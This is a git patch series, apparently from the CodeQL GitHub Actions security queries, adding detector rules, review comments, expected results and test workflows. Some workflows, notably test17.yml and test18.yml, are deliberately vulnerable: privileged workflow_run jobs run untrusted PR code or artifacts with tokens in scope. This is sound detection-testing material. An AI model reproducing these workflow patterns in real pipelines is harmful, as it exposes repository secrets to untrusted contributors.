+ outputs: + zip_url: ${{ steps.run.outputs.zip_url }} + any_plugins: ${{ steps.run.outputs.any_plugins }} + steps: + - uses: actions/checkout@v4 + + - name: Find artifact + id: run + env: + TOKEN: ${{ github.token }} + URL: ${{ github.event.workflow_run.artifacts_url }} + run: | + for (( i=1; i<=5; i++ )); do + [[ $i -gt 1 ]] && sleep 10 + echo "::group::Fetch list of artifacts (attempt $i/5)" + JSON="$(curl -v -L --get \ + --header "Authorization: token $TOKEN" \ + --url "$URL" + )" + echo "$JSON" + echo "::endgroup::" + ZIPURL="$(jq -r '.artifacts | map( select( .name == "jetpack-build" ) ) | sort_by( .created_at ) | last | .archive_download_url // empty' <<<"$JSON")" + PLUGINS="$(jq -r '.artifacts[] | select( .name == "plugins.tsv" )' <<<"$JSON")" + if [[ -n "$ZIPURL" ]]; then + break + fi + done + [[ -z "$ZIPURL" ]] && { echo "::error::Failed to find artifact."; exit 1; } + echo "Zip URL: $ZIPURL" + echo "zip_url=${ZIPURL}" >> "$GITHUB_OUTPUT" + if [[ -z "$PLUGINS" ]]; then + echo "Any plugins? No" + echo "any_plugins=false" >> "$GITHUB_OUTPUT" + else + echo "Any plugins? Yes" + echo "any_plugins=true" >> "$GITHUB_OUTPUT" + fi + + - name: Get token + id: get_token + if: ${{ ! success() }} + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + - name: 'Mark "Test plugin upgrades" failed' + if: ${{ ! success() }} + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: failure + title: Failed to find build artifact + summary: | + ${{ env.SUMMARY }} + + Post-build run aborted because the "Find artifact" step failed. + token: ${{ steps.get_token.outputs.token }} + + no_plugins: + name: Handle no-plugins + runs-on: ubuntu-latest + needs: [ setup, find_artifact ] + if: needs.find_artifact.outputs.any_plugins == 'false' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. 
+ steps: + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Mark "Test plugin upgrades" skipped' + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: skipped + title: No plugins were built + summary: | + ${{ env.SUMMARY }} + + Post-build run skipped because no plugins were built. + token: ${{ steps.get_token.outputs.token }} + + upgrade_test: + name: Test plugin upgrades + runs-on: ubuntu-latest + needs: [ setup, find_artifact ] + if: needs.find_artifact.outputs.any_plugins == 'true' + timeout-minutes: 15 # 2022-08-26: Successful runs seem to take about 6 minutes, but give some extra time for the downloads. + services: + db: + image: mariadb:lts + env: + MARIADB_ROOT_PASSWORD: wordpress + ports: + - 3306:3306 + options: --health-cmd="healthcheck.sh --su-mysql --connect --innodb_initialized" --health-interval=10s --health-timeout=5s --health-retries=5 + container: + image: ghcr.io/automattic/jetpack-wordpress-dev:latest + env: + WP_DOMAIN: localhost + WP_ADMIN_USER: wordpress + WP_ADMIN_EMAIL: wordpress@example.com + WP_ADMIN_PASSWORD: wordpress + WP_TITLE: Hello World + MYSQL_HOST: db:3306 + MYSQL_DATABASE: wordpress + MYSQL_USER: root + MYSQL_PASSWORD: wordpress + HOST_PORT: 80 + ports: + - 80:80 + steps: + - uses: actions/checkout@v4 + with: + path: trunk + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.workflow_run.head_commit.id }} + path: commit + + - name: Get token + id: get_token + uses: ./trunk/.github/actions/gh-app-token + env: + # Work around a weird node 16/openssl 3 issue in the docker env + OPENSSL_CONF: '/dev/null' + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: Notify check in progress + uses: ./trunk/.github/actions/check-run + with: + id: ${{ 
needs.setup.outputs.upgrade_check }} + status: in_progress + title: Test started... + summary: | + ${{ env.SUMMARY }} + + See run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for details. + token: ${{ steps.get_token.outputs.token }} + + - name: Download build artifact + env: + TOKEN: ${{ github.token }} + ZIPURL: ${{ needs.find_artifact.outputs.zip_url }} + shell: bash + run: | + for (( i=1; i<=2; i++ )); do + [[ $i -gt 1 ]] && sleep 10 + echo "::group::Downloading artifact (attempt $i/2)" + curl -v -L --get \ + --header "Authorization: token $TOKEN" \ + --url "$ZIPURL" \ + --output "artifact.zip" + echo "::endgroup::" + if [[ -e "artifact.zip" ]] && zipinfo artifact.zip &>/dev/null; then + break + fi + done + [[ ! -e "artifact.zip" ]] && { echo "::error::Failed to download artifact."; exit 1; } + unzip artifact.zip + tar --xz -xvvf build.tar.xz build + + - name: Setup WordPress + run: trunk/.github/files/test-plugin-update/setup.sh + + - name: Prepare plugin zips + id: zips + run: trunk/.github/files/test-plugin-update/prepare-zips.sh + + - name: Test upgrades + id: tests + run: trunk/.github/files/test-plugin-update/test.sh + + - name: Notify final status + if: always() + uses: ./trunk/.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: ${{ job.status }} + title: ${{ job.status == 'success' && 'Tests passed' || job.status == 'cancelled' && 'Cancelled' || 'Tests failed' }} + summary: | + ${{ env.SUMMARY }} + + ${{ steps.zips.outputs.info }}${{ steps.tests.outputs.info }} + + See run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for details. + token: ${{ steps.get_token.outputs.token }} diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 2a401dee18ae..2380236acca9 100644 
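Review bot: This fixture exercises only the negative side of the new `LocalActionUsesStep` path check: the PR head is checked out into `commit` while every local action is called as `./trunk/.github/actions/...` and every script as `trunk/.github/files/...`, and the accompanying UntrustedCheckoutCritical.expected hunk adds only `edges` rows for test16.yml with no `#select` row. Unless an existing fixture already covers it, a sibling workflow that invokes a local action from under the checkout directory (for example `uses: ./commit/.github/actions/check-run`, a constructed example) would pin the positive branch `isSubpath(poisonable.(LocalActionUsesStep).getPath(), checkout.getPath())`, so a regression in `normalizePath` or `isSubpath` that turns the check into never-matching would not pass silently as "no findings".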
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -244,6 +244,24 @@ edges | .github/workflows/test15.yml:236:7:242:4 | Run Step | .github/workflows/test15.yml:242:7:250:4 | Uses Step | | .github/workflows/test15.yml:242:7:250:4 | Uses Step | .github/workflows/test15.yml:250:7:270:4 | Uses Step | | .github/workflows/test15.yml:250:7:270:4 | Uses Step | .github/workflows/test15.yml:270:7:271:45 | Run Step | +| .github/workflows/test16.yml:43:9:47:6 | Run Step | .github/workflows/test16.yml:47:9:49:6 | Uses Step | +| .github/workflows/test16.yml:47:9:49:6 | Uses Step | .github/workflows/test16.yml:49:9:56:6 | Uses Step: get_token | +| .github/workflows/test16.yml:49:9:56:6 | Uses Step: get_token | .github/workflows/test16.yml:56:9:68:2 | Uses Step: upgrade_check | +| .github/workflows/test16.yml:75:9:77:6 | Uses Step | .github/workflows/test16.yml:77:9:84:6 | Uses Step: get_token | +| .github/workflows/test16.yml:77:9:84:6 | Uses Step: get_token | .github/workflows/test16.yml:84:9:96:2 | Uses Step | +| .github/workflows/test16.yml:106:9:108:6 | Uses Step | .github/workflows/test16.yml:108:9:140:6 | Run Step: run | +| .github/workflows/test16.yml:108:9:140:6 | Run Step: run | .github/workflows/test16.yml:140:9:147:6 | Uses Step: get_token | +| .github/workflows/test16.yml:140:9:147:6 | Uses Step: get_token | .github/workflows/test16.yml:147:9:160:2 | Uses Step | +| .github/workflows/test16.yml:167:9:169:6 | Uses Step | .github/workflows/test16.yml:169:9:176:6 | Uses Step: get_token | +| .github/workflows/test16.yml:169:9:176:6 | Uses Step: get_token | .github/workflows/test16.yml:176:9:188:2 | Uses Step | +| .github/workflows/test16.yml:218:9:221:6 | Uses Step | .github/workflows/test16.yml:221:9:226:6 | Uses Step | +| .github/workflows/test16.yml:221:9:226:6 | Uses Step | .github/workflows/test16.yml:226:9:236:6 | Uses Step: get_token | +| .github/workflows/test16.yml:226:9:236:6 | Uses Step: get_token | .github/workflows/test16.yml:236:9:248:6 | Uses Step | +| .github/workflows/test16.yml:236:9:248:6 | Uses Step 
| .github/workflows/test16.yml:248:9:270:6 | Run Step | +| .github/workflows/test16.yml:248:9:270:6 | Run Step | .github/workflows/test16.yml:270:9:273:6 | Run Step | +| .github/workflows/test16.yml:270:9:273:6 | Run Step | .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | +| .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | +| .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | .github/workflows/test16.yml:281:9:294:54 | Uses Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | From fc5a6703b34b5e50d72a670886d6af900a994ab8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 19 Oct 2024 17:01:47 +0200 Subject: [PATCH 601/707] Add github.event.sender.login as an Actor source --- ql/lib/codeql/actions/security/ControlChecks.qll | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 760efaf5e7e6..6293e4d6f3db 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -179,7 +179,8 @@ class ActorIfCheck extends ActorCheck instanceof If { .regexpFind([ "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", - "\\bgithub\\.event\\.commits.*\\.author\\.name\\b" + "\\bgithub\\.event\\.commits.*\\.author\\.name\\b", + "\\bgithub\\.event\\.sender\\.login\\b" ], _, _) ) or From 229d42b51516df3a59a5aa600640282b4b7d3d8c Mon Sep 17 00:00:00 2001 
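Review bot: The regex list in `ActorIfCheck` gains `github.event.sender.login` with no note on why it qualifies as an actor check, and the list gives no rationale for its other entries either; `sender` is the account that triggered the delivered webhook event, so a condition on it gates on the triggering user the same way `pull_request.user.login` does. A trailing comment on the new entry, `// sender = the account that triggered the event`, would save the next reader a trip to the webhook documentation. The enclosing `ActorIfCheck` body starts and ends outside the hunk.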
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 21 Oct 2024 11:05:06 +0200 Subject: [PATCH 602/707] Add sonar-scanner-action as a poisonable step --- ql/lib/ext/config/poisonable_steps.yml | 1 + .../CWE-829/.github/workflows/test17.yml | 23 +++++++++++ .../CWE-829/.github/workflows/test18.yml | 41 +++++++++++++++++++ .../ArtifactPoisoningCritical.expected | 4 ++ .../CWE-829/ArtifactPoisoningMedium.expected | 3 ++ .../CWE-829/UnpinnedActionsTag.expected | 2 + .../UntrustedCheckoutCritical.expected | 4 ++ 7 files changed, 78 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index addadd75c879..2ee9af6904ed 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -10,6 +10,7 @@ extensions: - ["ruby/setup-ruby"] - ["actions/jekyll-build-pages"] - ["qcastel/github-actions-maven/actions/maven"] + - ["sonarsource/sonarcloud-github-action"] - addsTo: pack: github/actions-all extensible: poisonableCommandsDataModel diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml new file mode 100644 index 000000000000..f679b772e340 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml 
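Review bot: The new entry is spelled `sonarsource/sonarcloud-github-action` while the action is published under the `SonarSource` organisation, and both fixtures added in this commit (test17.yml, test18.yml) use the lowercase form, so nothing here shows whether the data-model lookup on the callee is case-insensitive. If it compares exactly, workflows written with the canonical capitalisation would not be treated as poisonable; either confirm that the callee is lowercased before lookup or add a fixture using the mixed-case spelling. A short comment on the entry recording why the action is poisonable (the scanner reads its configuration, e.g. `sonar-project.properties`, from the checked-out tree) would also help, since the list otherwise carries no per-entry rationale.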
@@ -0,0 +1,23 @@ +name: Sonar +on: + workflow_run: + workflows: [PR Build] + types: [completed] +jobs: + sonar: + runs-on: ubuntu-latest + timeout-minutes: 30 + if: github.event.workflow_run.conclusion == 'success' + steps: + - name: Checkout PR code + uses: actions/checkout@v3 + with: + repository: ${{ github.event.workflow_run.head_repository.full_name }} + ref: ${{ github.event.workflow_run.head_branch }} + fetch-depth: 0 + + - name: SonarCloud Scan + uses: sonarsource/sonarcloud-github-action@master + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml new file mode 100644 index 000000000000..6347db51e3c9 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml 
@@ -0,0 +1,41 @@ +name: Sonar +on: + workflow_run: + workflows: [PR Build] + types: [completed] +jobs: + sonar: + runs-on: ubuntu-latest + timeout-minutes: 30 + if: github.event.workflow_run.conclusion == 'success' + steps: + - name: Download artifacts + uses: actions/github-script@v6 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "rsc-pr-build-artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/rsc-pr-build-artifacts.zip`, Buffer.from(download.data)); + + - name: Unzip artifacts + run: unzip rsc-pr-build-artifacts.zip + + - name: SonarCloud Scan + uses: sonarsource/sonarcloud-github-action@master + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 5c784595dbec..53b14ee7b50e 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
@@ -14,6 +14,7 @@ edges | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -44,6 +45,8 @@ nodes | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
@@ -61,3 +64,4 @@ subpaths | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | 
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index e6108dddd2a5..49cee7772c0a 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -14,6 +14,7 @@ edges | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | 
@@ -44,5 +45,7 @@ nodes | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index d05c7bebc07e..58a000efac4f 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -29,4 +29,6 @@ | .github/workflows/pr-workflow.yml:453:15:453:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | | .github/workflows/test7.yml:25:15:25:34 | pnpm/action-setup@v3 | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | | .github/workflows/test13.yml:15:13:15:53 | sushichop/action-repository-permission@v2 | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | +| .github/workflows/test17.yml:20:21:20:63 | sonarsource/sonarcloud-github-action@master | Unpinned 3rd party Action 'Sonar' step $@ uses 'sonarsource/sonarcloud-github-action' with ref 'master', not a pinned commit hash | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Uses Step | +| .github/workflows/test18.yml:37:21:37:63 | sonarsource/sonarcloud-github-action@master | Unpinned 3rd party Action 'Sonar' step $@ uses 'sonarsource/sonarcloud-github-action' with ref 'master', not a pinned commit hash | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:13:10:22 | foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 2380236acca9..baf354179b3e 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -262,6 +262,9 @@ edges | .github/workflows/test16.yml:270:9:273:6 | Run Step | .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | | .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | | .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | .github/workflows/test16.yml:281:9:294:54 | Uses Step | +| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:33:15:36:12 | Run Step | +| .github/workflows/test18.yml:33:15:36:12 | Run Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -325,6 +328,7 @@ edges | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | From 6dbbfa967277211aba958b5a261ff5c767dddeef Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 21 Oct 2024 12:12:37 +0200 Subject: [PATCH 603/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e5471e236511..c908efa68f7e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.69 +version: 0.1.70 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 660f3287090c..d2c2e26c361a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.69 +version: 0.1.70 groups: [actions, queries] suites: codeql-suites extractor: javascript From 023e8cbe3e00a1207d641f8f8139e942275b585d Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Mon, 21 Oct 2024 20:59:42 -0400 Subject: [PATCH 604/707] factor semver to separate function --- .../actions/security/UseOfUnversionedImmutableAction.qll | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll index 2be71612f26e..3f65a2ffc72c 100644 
--- a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll
+++ b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll
@@ -6,6 +6,11 @@ class UnversionedImmutableAction extends UsesStep {
   UnversionedImmutableAction() {
     immutableActionsDataModel(immutable_action) and
     this.getCallee() = immutable_action and
-    not this.getVersion().regexpMatch("^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$")
+    isNotSemVer(this.getVersion())
   }
 }
+
+bindingset[version]
+predicate isNotSemVer(string version) {
+  not version.regexpMatch("^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$")
+}
